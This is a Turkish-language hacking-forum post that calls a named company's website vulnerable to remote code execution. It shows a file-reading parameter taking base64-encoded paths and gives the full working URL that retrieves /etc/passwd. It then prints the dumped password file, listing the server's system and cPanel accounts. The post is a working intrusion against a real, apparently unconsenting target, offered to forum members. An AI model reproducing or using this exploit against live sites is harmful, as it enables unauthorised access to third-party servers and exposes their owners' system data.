• Hack kategorilerindeki birçok içerik Gizli içeriktir yani sadece cevap yazarakı erişebileceğiniz türden içeriklerdir, ancak yeni üyelerin hack kategorilerine cevap yazması engellenmiştir ! spam ve sömürüye karşı bir tedbirdir, forumumuza katkı sunarsanız rütbeniz kısa sürede yükselir ve tüm forumu engelsiz kullanabilirsiniz.

awfatech.com rce vulnerability

X

x

https://www.my03.awfatech.com/
https://www.my03.awfatech.com/yayasanaddin/p.php?p= base64 ile dosyaları çekiyor o yüzden.

/etc/passwd base64 çevirelim L2V0Yy9wYXNzd2Q=

url'in sonuna koyalım

https://www.my03.awfatech.com/yayasanaddin/p.php?p=L2V0Yy9wYXNzd2Q=

boom

Kod:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin mysql:x:498:499:MySQL server:/var/lib/mysql:/bin/bash cpanelhorde:x:500:500::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin dovenull:x:497:498:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin cpanel:x:32001:502::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell cpanelphpmyadmin:x:32002:503::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell cpanelphppgadmin:x:32003:504::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell cpanelroundcube:x:32004:505::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell cpanelrrdtool:x:32005:506::/var/cpanel/userhomes/cpanelrrdtool:/usr/local/cpanel/bin/noshell mailman:x:32006:507::/usr/local/cpanel/3rdparty/mailman:/usr/local/cpanel/bin/noshell cpanellogin:x:32007:509::/var/cpanel/userhomes/cpanellogin:/usr/local/cpanel/bin/noshell cpaneleximfilter:x:32008:510::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell cpaneleximscanner:x:32009:511::/var/cpanel/userhomes/cpaneleximscanner:/usr/local/cpanel/bin/noshell cpses:x:496:497::/var/cpanel/cpses:/sbin/nologin clamav:x:32010:512::/home/clamav:/sbin/nologin my03:x:505:517::/home/my03:/usr/local/cpanel/bin/jailshell cpanelconnecttrack:x:32011:518::/var/cpanel/userhomes/cpanelconnecttrack:/usr/local/cpanel/bin/noshell nscd:x:28:28:NSCD Daemon:/:/sbin/nologin cpanelcabcache:x:495:495::/var/cpanel/userhomes/cpanelcabcache:/usr/local/cpanel/bin/noshell cpanelsolr:x:494:494:Solr Search Server for Dovecot:/home/cpanelsolr:/bin/false cpanelanalytics:x:493:493::/var/cpanel/userhomes/cpanelanalytics:/usr/local/cpanel/bin/noshell
 
Üst Alt